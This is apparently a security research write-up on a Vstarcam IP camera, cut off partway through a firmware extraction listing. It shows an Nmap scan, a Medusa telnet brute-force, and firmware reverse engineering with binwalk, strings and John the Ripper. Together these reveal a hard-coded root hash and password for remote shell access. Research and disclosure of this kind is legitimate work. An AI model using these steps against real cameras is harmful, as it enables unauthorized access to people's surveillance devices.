1. Camera specifications
– Brand : Vstarcam
– Product name : C7824WIP HD indoor IP Camera
– Model : C7824WIP
– OS : Embedded Linux OS
– CPU :
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
> cat /proc/cpuinfo Processor : ARM926EJ-S rev 5 (v5l) BogoMIPS : 217.08 Features : swp half thumb fastmult edsp java CPU implementer : 0x41 CPU architecture: 5TEJ CPU variant : 0x0 CPU part : 0x926 CPU revision : 5 Hardware : hi3518 Revision : 0000 Serial : 0000000000000000 |
2. Security vulnerabilities
Achievements :
– Remotely take control of the camera (telnet)
– Find the web UI password
Methods :
– Bruteforce : success
– Firmware reverse engineering : success
– Form injection : success
3. Network services analysis
Scan all the active network services on the camera using Nmap :
|
1 2 3 4 5 6 7 8 9 |
>nmap -sV 192.168.1.16 Starting Nmap 6.47 ( http://nmap.org ) at 2016-01-21 20:59 SGT Nmap scan report for 192.168.1.16 Host is up (0.014s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 23/tcp open telnet? 81/tcp open http GoAhead-Webs httpd |
– 80/http : The web interface : Documented
– 23/telnet : Remote command line access : Undocumented
4. Telnet penetration test
4.1 Method 1 : Bruteforce
The password is cracked in a few seconds using Medusa. Hydra fails to crack the password.
|
1 2 3 4 5 6 7 8 9 10 |
>medusa -u root -P passwords.txt -h 192.168.1.16 -M telnet Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net> ACCOUNT CHECK: [telnet] Host: 192.168.1.16 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 111111 (1 of 370 complete) ACCOUNT CHECK: [telnet] Host: 192.168.1.16 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 11111111 (2 of 370 complete) ACCOUNT CHECK: [telnet] Host: 192.168.1.16 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 112233 (3 of 370 complete) ACCOUNT CHECK: [telnet] Host: 192.168.1.16 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 121212 (4 of 370 complete) ACCOUNT CHECK: [telnet] Host: 192.168.1.16 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123123 (5 of 370 complete) ACCOUNT CHECK: [telnet] Host: 192.168.1.16 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (6 of 370 complete) ACCOUNT FOUND: [telnet] Host: 192.168.1.16 User: root Password: 123456 [SUCCESS] |
The root password : 123456.
4.2 Method 2 : Reverse engineering
4.2.1 Tools
Binwalk
Binwalk is a firmware analysis tool designed for analyzing, reverse engineering and extracting data contained in firmware images.
The last stable version of Binwalk (2.1.1) was not extracting the firmware correctly, so I had to install the 2.0.0. The bug should be solved in the next version.
Install Binwalk 2.0.0 :
|
1 2 3 4 5 6 7 |
> wget https://github.com/devttys0/binwalk/archive/v2.0.0.zip > unzip v2.0.0.zip > cd binwalk-2.0.0 > /deps.sh > ./configure > make > make install |
4.2.2 Firmware reverse engineering
Firmware servers and download link
Sniffing the traffic between the Vstarcam firmware upgrade software and Internet allows us to easily identify the servers and the protocol used to retrieve and upgrade camera firmware.
Remote file : http://45.63.8.70/FM/system/firmware.txt
So we can download our firmware (45.63.8.70) using the following link : http://45.63.8.70/FM/system/CH-sys-48.53.64.67.zip
Firmware download and extraction
Create a working folder :
|
1 2 |
> mkdir firmware > cd firmware |
Download and extract the zipped firmware :
|
1 2 |
> wget http://45.63.8.70/FM/system/CH-sys-48.53.64.67.zip > unzip CH-sys-48.53.64.67.zip |
Binary header analysis :
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
> head -n1 CH-sys-48.53.64.67.bin | hexdump -C 00000000 77 77 77 2e 6f 62 6a 65 63 74 2d 63 61 6d 65 72 |www.object-camer| 00000010 61 2e 63 6f 6d 2e 62 79 2e 68 6f 6e 67 7a 78 2e |a.com.by.hongzx.| 00000020 73 79 73 74 65 6d 2f 73 79 73 74 65 6d 2f 6c 69 |system/system/li| 00000030 62 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |b/..............| 00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00000060 6c 69 62 73 6e 73 5f 67 63 31 30 30 34 2e 73 6f |libsns_gc1004.so| 00000070 2e 7a 69 70 00 00 00 00 00 00 00 00 00 00 00 00 |.zip............| 00000080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 000000a0 e3 23 00 00 43 40 35 30 00 00 00 00 50 4b 03 04 |.#..C@50....PK..| 000000b0 14 00 00 00 08 00 fa 8b 5d 47 89 42 30 43 09 23 |........]G.B0C.#| 000000c0 00 00 93 4a 00 00 22 00 1c 00 73 79 73 74 65 6d |...J.."...system| 000000d0 2f 73 79 73 74 65 6d 2f 6c 69 62 2f 6c 69 62 73 |/system/lib/libs| 000000e0 6e 73 5f 67 63 31 30 30 34 2e 73 6f 55 54 09 00 |ns_gc1004.soUT..| 000000f0 03 88 e7 31 56 88 e7 31 56 75 78 0b 00 01 04 ed |...1V..1Vux.....| 00000100 03 00 00 04 ed 03 00 00 e5 7c 0b 78 53 55 d6 f6 |.........|.xSU..| 00000110 3e b9 b4 69 9a cb 69 cf 29 96 8b 92 0a |>..i..i.)....| |
We should be able to use Binwalk to extract the firmware :
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 |
> binwalk -Mer CH-sys-48.53.64.67.bin Scan Time: 2016-01-20 01:02:57 Target File: CH-sys-48.53.64.67.bin MD5 Checksum: 58df9214226cfe46760215bfca0c496c Signatures: 285 DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 172 0xAC Zip archive data, at least v2.0 to extract, compressed size: 8969, uncompressed size: 19091, name: "system/system/lib/libsns_gc1004.so" 9337 0x2479 End of Zip archive 9499 0x251B Zip archive data, at least v2.0 to extract, compressed size: 7813, uncompressed size: 16341, name: "system/system/lib/libsns_ov9712_plus.so" 17518 0x446E End of Zip archive 17680 0x4510 Zip archive data, at least v2.0 to extract, compressed size: 90121, uncompressed size: 353248, name: "system/system/lib/libOnvif.so" 107987 0x1A5D3 End of Zip archive 108149 0x1A675 Zip archive data, at least v2.0 to extract, compressed size: 43603, uncompressed size: 84480, name: "system/system/lib/libvoice_arm.so" 151946 0x2518A End of Zip archive 152108 0x2522C Zip archive data, at least v2.0 to extract, compressed size: 130, uncompressed size: 227, name: "system/init/ipcam.sh" 152406 0x25356 End of Zip archive 152568 0x253F8 Zip archive data, at least v2.0 to extract, compressed size: 402383, uncompressed size: 886168, name: "system/system/bin/encoder" 555129 0x87879 End of Zip archive 555291 0x8791B Zip archive data, at least v2.0 to extract, compressed size: 35394, uncompressed size: 74200, name: "system/system/bin/wifidaemon" 590869 0x90415 End of Zip archive 591031 0x904B7 Zip archive data, at least v2.0 to extract, compressed size: 1852, uncompressed size: 9692, name: "system/system/bin/grade.sh" 593063 0x90CA7 End of Zip archive 593225 0x90D49 Zip archive data, at least v2.0 to extract, compressed size: 8704, uncompressed size: 20212, name: "system/system/bin/updata" 602105 0x92FF9 End of Zip archive 602267 0x9309B Zip archive data, at least v2.0 to extract, compressed size: 1874, uncompressed size: 4522, name: "system/system/bin/gpio_aplink.ko" 604333 0x938AD End of Zip archive 604495 0x9394F Zip archive data, at least v2.0 to extract, compressed size: 7241, uncompressed size: 16802, name: "system/system/bin/motogpio.ko" 611922 0x95652 End of Zip archive 612084 0x956F4 Zip archive data, at least v1.0 to extract, compressed size: 8, uncompressed size: 8, name: "system/system/bin/fwversion.bin" 612282 0x957BA End of Zip archive 612444 0x9585C Zip archive data, at least v1.0 to extract, compressed size: 9, uncompressed size: 9, name: "system/system/bin/sysversion.txt" 612645 0x95925 End of Zip archive |
Using tree to see the files available :
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
> tree _CH-sys-48.53.64.67.bin.extracted/ _CH-sys-48.53.64.67.bin.extracted/ └── system ├── init │  └── ipcam.sh └── system ├── bin │  ├── encoder │  ├── fwversion.bin │  ├── gpio_aplink.ko │  ├── grade.sh │  ├── motogpio.ko │  ├── sysversion.txt │  ├── updata │  └── wifidaemon └── lib ├── libOnvif.so ├── libsns_gc1004.so ├── libsns_ov9712_plus.so └── libvoice_arm.so 5 directories, 13 files |
Done !
Firmware analysis and password retrieval
Looking for the files containing the “passwd” string :
|
1 2 3 |
> grep -r "passwd" . Binary file ./system/system/bin/wifidaemon matches Binary file ./system/system/bin/encoder matches |
And check in these files for the password.
– wifidaemon :
|
1 2 3 4 |
> strings system/system/bin/wifidaemon | grep -A 1 -B 1 passwd iRet %d pkey:%s keyvalue:%s /etc/passwd root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh |
– encoder :
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
> strings system/system/bin/encoder | grep -A 1 -B 1 passwd factory_user factory_passwd factory_alarmserver -- alarmuser alarmpasswd alarmdeviceid -- ===websLaunchCgiProc=== /etc/passwd root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh -- SET_PARAMETER check_user_passwd right check_user_passwd erro Unknown RTSP server state[%d] |
So the hashed password for root user is : LSiuY7pOmZG2s. This is encrypted, you can’t use this one to login. We need to crack it first :
|
1 2 3 4 5 6 |
> echo "root:LSiuY7pOmZG2s" > password.txt > john password.txt Loaded 1 password hash (Traditional DES [128/128 BS SSE2-16]) 123456 (root) guesses: 1 time: 0:00:00:00 100% (2) c/s: 17680 trying: 12345 - biteme Use the "--show" option to display all of the cracked passwords reliably |
The root password : 123456.
4.2.3 WebUI reverse engineering
Now that you have a root access, you could go online and retrieve all the WebUI directly from the device. However, we’ll show here the reverse engineering way.
Firmware servers and download link
Sniffing the traffic between the Vstarcam firmware upgrade software and Internet allows us to easily identify the servers and the protocol used to retrieve and upgrade camera WebUI.
Remote file: http://45.63.8.70/FM/vstarcam/firmware.txt
So we can download the WebUI EN53.8.1.13 using the following link : http://45.63.8.70/FM/vstarcam/CH-app-CH53.8.1.13_VSTARCAM.zip
WebUI download and extraction
Create a working folder :
|
1 2 |
> mkdir webui > cd webui |
Download and extract the zipped firmware :
|
1 2 |
> wget http://45.63.8.70/FM/vstarcam/CH-app-CH53.8.1.13_VSTARCAM.zip > unzip CH-app-CH53.8.1.13_VSTARCAM.zip |
Now we can use Binwalk to extract the .bin firmware :
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 |
> binwalk -Mer CH-app-EN53.8.1.13_VSTARCAM.bin Scan Time: 2016-01-21 01:29:23 Target File: CH-app-EN53.8.1.13_VSTARCAM.bin MD5 Checksum: 41965a8a4aea9293a0b111e7bf004fcc Signatures: 285 DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 36 0x24 Zip encrypted archive data, at least v1.0 to extract, compressed size: 12, name: "www/" 98 0x62 Zip encrypted archive data, at least v2.0 to extract, compressed size: 1593, uncompressed size: 10647, name: "www/admin.htm" 1750 0x6D6 Zip encrypted archive data, at least v2.0 to extract, compressed size: 1583, uncompressed size: 10326, name: "www/admin2.htm" 3393 0xD41 Zip encrypted archive data, at least v2.0 to extract, compressed size: 3870, uncompressed size: 17524, name: "www/alarm.htm" 7322 0x1C9A Zip encrypted archive data, at least v2.0 to extract, compressed size: 116018, uncompressed size: 137930, name: "www/alarm.pcm" 123399 0x1E207 Zip encrypted archive data, at least v2.0 to extract, compressed size: 857, uncompressed size: 1972, name: "www/alias.htm" 124315 0x1E59B Zip encrypted archive data, at least v2.0 to extract, compressed size: 948, uncompressed size: 2458, name: "www/ap.htm" 125319 0x1E987 Zip encrypted archive data, at least v1.0 to extract, compressed size: 40, uncompressed size: 28, name: "www/appver.js" 125418 0x1E9EA Zip encrypted archive data, at least v2.0 to extract, compressed size: 924, uncompressed size: 2265, name: "www/audio.htm" 126401 0x1EDC1 Zip encrypted archive data, at least v2.0 to extract, compressed size: 250, uncompressed size: 384, name: "www/audioparam.bin" 126715 0x1EEFB Zip encrypted archive data, at least v2.0 to extract, compressed size: 1374, uncompressed size: 4439, name: "www/datetime.htm" 128151 0x1F497 Zip encrypted archive data, at least v2.0 to extract, compressed size: 2935, uncompressed size: 12570, name: "www/ddns.htm" 131144 0x20048 Zip encrypted archive data, at least v2.0 to extract, compressed size: 1048, uncompressed size: 2377, name: "www/dns.htm" 132249 0x20499 Zip encrypted archive data, at least v1.0 to extract, compressed size: 12, name: "www/english/" 132319 0x204DF Zip encrypted archive data, at least v2.0 to extract, compressed size: 213, uncompressed size: 449, name: "www/english/oem.js" 132596 0x205F4 Zip encrypted archive data, at least v2.0 to extract, compressed size: 10268, uncompressed size: 31357, name: "www/english/string.js" 142931 0x22E53 Zip encrypted archive data, at least v2.0 to extract, compressed size: 1449, uncompressed size: 5038, name: "www/ftp.htm" 144437 0x23435 Zip encrypted archive data, at least v2.0 to extract, compressed size: 785, uncompressed size: 13019, name: "www/functions.htm" 145285 0x23785 Zip encrypted archive data, at least v1.0 to extract, compressed size: 12, name: "www/images/" 145354 0x237CA Zip encrypted archive data, at least v1.0 to extract, compressed size: 289, uncompressed size: 277, name: "www/images/2_10.gif" 145708 0x2392C Zip encrypted archive data, at least v2.0 to extract, compressed size: 101, uncompressed size: 95, name: "www/images/2_11.gif" 145874 0x239D2 Zip encrypted archive data, at least v2.0 to extract, compressed size: 164, uncompressed size: 197, name: "www/images/2_13.gif" 146103 0x23AB7 Zip encrypted archive data, at least v1.0 to extract, compressed size: 1726, uncompressed size: 1714, name: "www/images/2_16.gif" 147894 0x241B6 Zip encrypted archive data, at least v1.0 to extract, compressed size: 676, uncompressed size: 664, name: "www/images/2_17.gif" 148635 0x2449B Zip encrypted archive data, at least v2.0 to extract, compressed size: 101, uncompressed size: 95, name: "www/images/2_19.gif" 148801 0x24541 Zip encrypted archive data, at least v1.0 to extract, compressed size: 678, uncompressed size: 666, name: "www/images/2_20.gif" 149544 0x24828 Zip encrypted archive data, at least v1.0 to extract, compressed size: 291, uncompressed size: 279, name: "www/images/2_27.gif" 149900 0x2498C Zip encrypted archive data, at least v2.0 to extract, compressed size: 62, uncompressed size: 54, name: "www/images/2_item.gif" 150029 0x24A0D Zip encrypted archive data, at least v2.0 to extract, compressed size: 155, uncompressed size: 154, name: "www/images/333.gif" 150248 0x24AE8 Zip encrypted archive data, at least v2.0 to extract, compressed size: 326, uncompressed size: 512, name: "www/images/alarm.gif" 150640 0x24C70 Zip encrypted archive data, at least v2.0 to extract, compressed size: 2438, uncompressed size: 3516, name: "www/images/alarm.wav" 153144 0x25638 Zip encrypted archive data, at least v2.0 to extract, compressed size: 1078, uncompressed size: 1167, name: "www/images/alert.gif" 154288 0x25AB0 Zip encrypted archive data, at least v2.0 to extract, compressed size: 627, uncompressed size: 643, name: "www/images/autopos.gif" 154983 0x25D67 Zip encrypted archive data, at least v1.0 to extract, compressed size: 1157, uncompressed size: 1145, name: "www/images/back.gif" 156205 0x2622D Zip encrypted archive data, at least v2.0 to extract, compressed size: 214, uncompressed size: 211, name: "www/images/bg.png" 156482 0x26342 Zip encrypted archive data, at least v2.0 to extract, compressed size: 16438, uncompressed size: 29471, name: "www/images/bg_right.jpg" 172989 0x2A3BD Zip encrypted archive data, at least v2.0 to extract, compressed size: 12816, uncompressed size: 12911, name: "www/images/btn_circle.gif" 185876 0x2D614 Zip encrypted archive data, at least v2.0 to extract, compressed size: 548, uncompressed size: 600, name: "www/images/btn_jianting.gif" 186497 0x2D881 Zip encrypted archive data, at least v2.0 to extract, compressed size: 544, uncompressed size: 600, name: "www/images/btn_jianting_on.gif" 187117 0x2DAED Zip encrypted archive data, at least v2.0 to extract, compressed size: 763, uncompressed size: 797, name: "www/images/btn_luxiang.gif" 187952 0x2DE30 Zip encrypted archive data, at least v2.0 to extract, compressed size: 1008, uncompressed size: 1192, name: "www/images/btn_luxiang_on.gif" 189035 0x2E26B Zip encrypted archive data, at least v1.0 to extract, compressed size: 1328, uncompressed size: 1316, name: "www/images/btn_paizhao.gif" 190435 0x2E7E3 Zip encrypted archive data, at least v1.0 to extract, compressed size: 1328, uncompressed size: 1316, name: "www/images/btn_shezhi.gif" 191834 0x2ED5A Zip encrypted archive data, at least v2.0 to extract, compressed size: 554, uncompressed size: 622, name: "www/images/btn_talk.gif" 192457 0x2EFC9 Zip encrypted archive data, at least v2.0 to extract, compressed size: 705, uncompressed size: 1025, name: "www/images/btn_talk_on.gif" 193234 0x2F2D2 Zip encrypted archive data, at least v1.0 to extract, compressed size: 1775, uncompressed size: 1763, name: "www/images/CD.gif" 195072 0x2FA00 Zip encrypted archive data, at least v1.0 to extract, compressed size: 2002, uncompressed size: 1990, name: "www/images/client.gif" 197141 0x30215 Zip encrypted archive data, at least v2.0 to extract, compressed size: 1111, uncompressed size: 1406, name: "www/images/clr_bright.gif" 198323 0x306B3 Zip encrypted archive data, at least v2.0 to extract, compressed size: 1082, uncompressed size: 1392, name: "www/images/clr_contast.gif" 199477 0x30B35 Zip encrypted archive data, at least v2.0 to extract, compressed size: 1133, uncompressed size: 1393, name: "www/images/clr_hue.gif" 200678 0x30FE6 Zip encrypted archive data, at least v2.0 to extract, compressed size: 1183, uncompressed size: 1378, name: "www/images/clr_saturation.gif" 201936 0x314D0 Zip encrypted archive data, at least v2.0 to extract, compressed size: 490, uncompressed size: 596, name: "www/images/del.gif" 202490 0x316FA Zip encrypted archive data, at least v2.0 to extract, compressed size: 499, uncompressed size: 598, name: "www/images/download.gif" 203058 0x31932 Zip encrypted archive data, at least v2.0 to extract, compressed size: 141, uncompressed size: 132, name: "www/images/elogo.gif" 203265 0x31A01 Zip encrypted archive data, at least v1.0 to extract, compressed size: 1932, uncompressed size: 1920, name: "www/images/firefox.gif" 205265 0x321D1 Zip encrypted archive data, at least v2.0 to extract, compressed size: 4536, uncompressed size: 4593, name: "www/images/green.gif" 209867 0x333CB Zip encrypted archive data, at least v2.0 to extract, compressed size: 915, uncompressed size: 1049, name: "www/images/hpatrol.gif" 210850 0x337A2 Zip encrypted archive data, at least v1.0 to extract, compressed size: 637, uncompressed size: 625, name: "www/images/hpatrol_down.gif" 211560 0x33A68 Zip encrypted archive data, at least v2.0 to extract, compressed size: 1123, uncompressed size: 1367, name: "www/images/hpatrol_up.gif" 212754 0x33F12 Zip encrypted archive data, at least v1.0 to extract, compressed size: 1623, uncompressed size: 1611, name: "www/images/IE.gif" 214440 0x345A8 Zip encrypted archive data, at least v2.0 to extract, compressed size: 29969, uncompressed size: 30067, name: "www/images/index_bg.gif" 244478 0x3BAFE Zip encrypted archive data, at least v1.0 to extract, compressed size: 1849, uncompressed size: 1837, name: "www/images/iphone.gif" 246394 0x3C27A Zip encrypted archive data, at least v2.0 to extract, compressed size: 1131, uncompressed size: 1363, name: "www/images/ir0.gif" 247589 0x3C725 Zip encrypted archive data, at least v2.0 to extract, compressed size: 1145, uncompressed size: 1355, name: "www/images/ir1.gif" 248798 0x3CBDE Zip encrypted archive data, at least v2.0 to extract, compressed size: 575, uncompressed size: 621, name: "www/images/line.gif" 249438 0x3CE5E Zip encrypted archive data, at least v2.0 to extract, compressed size: 2953, uncompressed size: 2955, name: "www/images/logo.gif" 252456 0x3DA28 Zip encrypted archive data, at least v2.0 to extract, compressed size: 1580, uncompressed size: 1622, name: "www/images/logo1.gif" 254102 0x3E096 Zip encrypted archive data, at least v1.0 to extract, compressed size: 3118, uncompressed size: 3106, name: "www/images/logo2.gif" 257286 0x3ED06 Zip encrypted archive data, at least v2.0 to extract, compressed size: 626, uncompressed size: 639, name: "www/images/mirror.gif" 257979 0x3EFBB Zip encrypted archive data, at least v2.0 to extract, compressed size: 921, uncompressed size: 940, name: "www/images/mirror_on.gif" 258970 0x3F39A Zip encrypted archive data, at least v1.0 to extract, compressed size: 184, uncompressed size: 172, name: "www/images/modellogo.gif" 259224 0x3F498 Zip encrypted archive data, at least v2.0 to extract, compressed size: 301, uncompressed size: 301, name: "www/images/nav-1.gif" 259591 0x3F607 Zip encrypted archive data, at least v2.0 to extract, compressed size: 254, uncompressed size: 258, name: "www/images/nav.gif" 259909 0x3F745 Zip encrypted archive data, at least v2.0 to extract, compressed size: 1019, uncompressed size: 1145, name: "www/images/network.gif" 260996 0x3FB84 Zip encrypted archive data, at least v2.0 to extract, compressed size: 459, uncompressed size: 580, name: "www/images/no.gif" 261518 0x3FD8E Zip encrypted archive data, at least v2.0 to extract, compressed size: 270, uncompressed size: 337, name: "www/images/ok.gif" 261851 0x3FEDB Zip encrypted archive data, at least v2.0 to extract, compressed size: 852, uncompressed size: 1165, name: "www/images/option.gif" 262770 0x40272 Zip encrypted archive data, at least v1.0 to extract, compressed size: 2007, uncompressed size: 1995, name: "www/images/osd01.gif" 264843 0x40A8B Zip encrypted archive data, at least v1.0 to extract, compressed size: 1628, uncompressed size: 1616, name: "www/images/osd02.gif" 266537 0x41129 Zip encrypted archive data, at least v2.0 to extract, compressed size: 233, uncompressed size: 229, name: "www/images/p.gif" 266832 0x41250 Zip encrypted archive data, at least v1.0 to extract, compressed size: 7826, uncompressed size: 7814, name: "www/images/pan_1.gif" 274724 0x43124 Zip encrypted archive data, at least v1.0 to extract, compressed size: 999, uncompressed size: 987, name: "www/images/pan_2.gif" 275789 0x4354D Zip encrypted archive data, at least v1.0 to extract, compressed size: 1091, uncompressed size: 1079, name: "www/images/pan_3.gif" 276946 0x439D2 Zip encrypted archive data, at least v1.0 to extract, compressed size: 16746, uncompressed size: 16734, name: "www/images/pan_4.gif" 293758 0x47B7E Zip encrypted archive data, at least v1.0 to extract, compressed size: 1842, uncompressed size: 1830, name: "www/images/phone.gif" 295666 0x482F2 Zip encrypted archive data, at least v1.0 to extract, compressed size: 779, uncompressed size: 767, name: "www/images/playback.gif" 296514 0x48642 Zip encrypted archive data, at least v2.0 to extract, compressed size: 923, uncompressed size: 1030, name: "www/images/ptz_19.gif" 297504 0x48A20 Zip encrypted archive data, at least v2.0 to extract, compressed size: 1017, uncompressed size: 1076, name: "www/images/ptz_24.gif" 298588 0x48E5C Zip encrypted archive data, at least v2.0 to extract, compressed size: 901, uncompressed size: 1015, name: "www/images/ptz_26.gif" 299556 0x49224 Zip encrypted archive data, at least v2.0 to extract, compressed size: 910, uncompressed size: 1025, name: "www/images/ptz_29.gif" 300533 0x495F5 Zip encrypted archive data, at least v2.0 to extract, compressed size: 911, uncompressed size: 1021, name: "www/images/ptz_34.gif" 301511 0x499C7 Zip encrypted archive data, at least v2.0 to extract, compressed size: 714, uncompressed size: 809, name: "www/images/pt_speed.gif" 302294 0x49CD6 Zip encrypted archive data, at least v1.0 to extract, compressed size: 362, uncompressed size: 350, name: "www/images/rec.gif" 302720 0x49E80 Zip encrypted archive data, at least v2.0 to extract, compressed size: 1232, uncompressed size: 1224, name: "www/images/record.gif" 304019 0x4A393 Zip encrypted archive data, at least v2.0 to extract, compressed size: 4595, uncompressed size: 4644, name: "www/images/red.gif" 308678 0x4B5C6 Zip encrypted archive data, at least v2.0 to extract, compressed size: 624, uncompressed size: 640, name: "www/images/reversal.gif" 309371 0x4B87B Zip encrypted archive data, at least v2.0 to extract, compressed size: 929, uncompressed size: 940, name: "www/images/reversal_on.gif" 310372 0x4BC64 Zip encrypted archive data, at least v1.0 to extract, compressed size: 368, uncompressed size: 356, name: "www/images/signal0.png" 310808 0x4BE18 Zip encrypted archive data, at least v1.0 to extract, compressed size: 375, uncompressed size: 363, name: "www/images/signal1.png" 311251 0x4BFD3 Zip encrypted archive data, at least v1.0 to extract, compressed size: 374, uncompressed size: 362, name: "www/images/signal2.png" 311693 0x4C18D Zip encrypted archive data, at least v1.0 to extract, compressed size: 380, uncompressed size: 368, name: "www/images/signal3.png" 312141 0x4C34D Zip encrypted archive data, at least v1.0 to extract, compressed size: 380, uncompressed size: 368, name: "www/images/signal4.png" 312589 0x4C50D Zip encrypted archive data, at least v1.0 to extract, compressed size: 369, uncompressed size: 357, name: "www/images/signal5.png" 313026 0x4C6C2 Zip encrypted archive data, at least v2.0 to extract, compressed size: 59, uncompressed size: 49, name: "www/images/space.gif" 313151 0x4C73F Zip encrypted archive data, at least v2.0 to extract, compressed size: 1004, uncompressed size: 1302, name: "www/images/switchoff_up.gif" 314228 0x4CB74 Zip encrypted archive data, at least v2.0 to extract, compressed size: 987, uncompressed size: 1281, name: "www/images/switchon_up.gif" 315287 0x4CF97 Zip encrypted archive data, at least v2.0 to extract, compressed size: 927, uncompressed size: 1055, name: "www/images/vpatrol.gif" 316282 0x4D37A Zip encrypted archive data, at least v2.0 to extract, compressed size: 708, uncompressed size: 884, name: "www/images/vpatrol_down.gif" 317063 0x4D687 Zip encrypted archive data, at least v2.0 to extract, compressed size: 1154, uncompressed size: 1401, name: "www/images/vpatrol_up.gif" 318288 0x4DB50 Zip encrypted archive data, at least v2.0 to extract, compressed size: 913, uncompressed size: 945, name: "www/images/x1_off.gif" 319268 0x4DF24 Zip encrypted archive data, at least v2.0 to extract, compressed size: 1257, uncompressed size: 1290, name: "www/images/x1_on.gif" 320591 0x4E44F Zip encrypted archive data, at least v2.0 to extract, compressed size: 851, uncompressed size: 876, name: "www/images/x4_off.gif" 321509 0x4E7E5 Zip encrypted archive data, at least v2.0 to extract, compressed size: 1321, uncompressed size: 1607, name: "www/images/x4_on.gif" 322896 0x4ED50 Zip encrypted archive data, at least v1.0 to extract, compressed size: 942, uncompressed size: 930, name: "www/images/x9_off.gif" 323905 0x4F141 Zip encrypted archive data, at least v2.0 to extract, compressed size: 1416, uncompressed size: 1674, name: "www/images/x9_on.gif" 325387 0x4F70B Zip encrypted archive data, at least v2.0 to extract, compressed size: 539, uncompressed size: 1030, name: "www/index.htm" 325985 0x4F961 Zip encrypted archive data, at least v2.0 to extract, compressed size: 1920, uncompressed size: 8471, name: "www/ip.htm" 327961 0x50119 Zip encrypted archive data, at least v2.0 to extract, compressed size: 1378, uncompressed size: 4199, name: "www/iphone.htm" 329399 0x506B7 Zip encrypted archive data, at least v1.0 to extract, compressed size: 12, name: "www/jquery/" 329468 0x506FC Zip encrypted archive data, at least v1.0 to extract, compressed size: 12, name: "www/jquery/images/" 329544 0x50748 Zip encrypted archive data, at least v2.0 to extract, compressed size: 265, uncompressed size: 260, name: "www/jquery/images/ui-bg_diagonals-thick_18_b81900_40x40.png" 329914 0x508BA Zip encrypted archive data, at least v1.0 to extract, compressed size: 263, uncompressed size: 251, name: "www/jquery/images/ui-bg_diagonals-thick_20_666666_40x40.png" 330282 0x50A2A Zip encrypted archive data, at least v2.0 to extract, compressed size: 114, uncompressed size: 180, name: "www/jquery/images/ui-bg_flat_0_aaaaaa_40x100.png" 330490 0x50AFA Zip encrypted archive data, at least v2.0 to extract, compressed size: 112, uncompressed size: 178, name: "www/jquery/images/ui-bg_flat_10_000000_40x100.png" 330697 0x50BC9 Zip encrypted archive data, at least v2.0 to extract, compressed size: 112, uncompressed size: 178, name: "www/jquery/images/ui-bg_flat_75_ffffff_40x100.png" 330904 0x50C98 Zip encrypted archive data, at least v2.0 to extract, compressed size: 114, uncompressed size: 104, name: "www/jquery/images/ui-bg_glass_100_f6f6f6_1x400.png" 331114 0x50D6A Zip encrypted archive data, at least v2.0 to extract, compressed size: 132, uncompressed size: 125, name: "www/jquery/images/ui-bg_glass_100_fdf5ce_1x400.png" 331342 0x50E4E Zip encrypted archive data, at least v2.0 to extract, compressed size: 131, uncompressed size: 120, name: "www/jquery/images/ui-bg_glass_55_fbf9ee_1x400.png" 331568 0x50F30 Zip encrypted archive data, at least v2.0 to extract, compressed size: 115, uncompressed size: 105, name: "www/jquery/images/ui-bg_glass_65_ffffff_1x400.png" 331778 0x51002 Zip encrypted archive data, at least v2.0 to extract, compressed size: 121, uncompressed size: 111, name: "www/jquery/images/ui-bg_glass_75_dadada_1x400.png" 331994 0x510DA Zip encrypted archive data, at least v2.0 to extract, compressed size: 120, uncompressed size: 110, name: "www/jquery/images/ui-bg_glass_75_e6e6e6_1x400.png" 332209 0x511B1 Zip encrypted archive data, at least v2.0 to extract, compressed size: 130, uncompressed size: 119, name: "www/jquery/images/ui-bg_glass_95_fef1ec_1x400.png" 332434 0x51292 Zip encrypted archive data, at least v2.0 to extract, compressed size: 3576, uncompressed size: 3762, name: "www/jquery/images/ui-bg_gloss-wave_35_f6a828_500x100.png" 336112 0x520F0 Zip encrypted archive data, at least v2.0 to extract, compressed size: 99, uncompressed size: 90, name: "www/jquery/images/ui-bg_highlight-soft_100_eeeeee_1x100.png" 336316 0x521BC Zip encrypted archive data, at least v2.0 to extract, compressed size: 110, uncompressed size: 101, name: "www/jquery/images/ui-bg_highlight-soft_75_cccccc_1x100.png" 336530 0x52292 Zip encrypted archive data, at least v2.0 to extract, compressed size: 140, uncompressed size: 129, name: "www/jquery/images/ui-bg_highlight-soft_75_ffe45c_1x100.png" 336774 0x52386 Zip encrypted archive data, at least v2.0 to extract, compressed size: 4152, 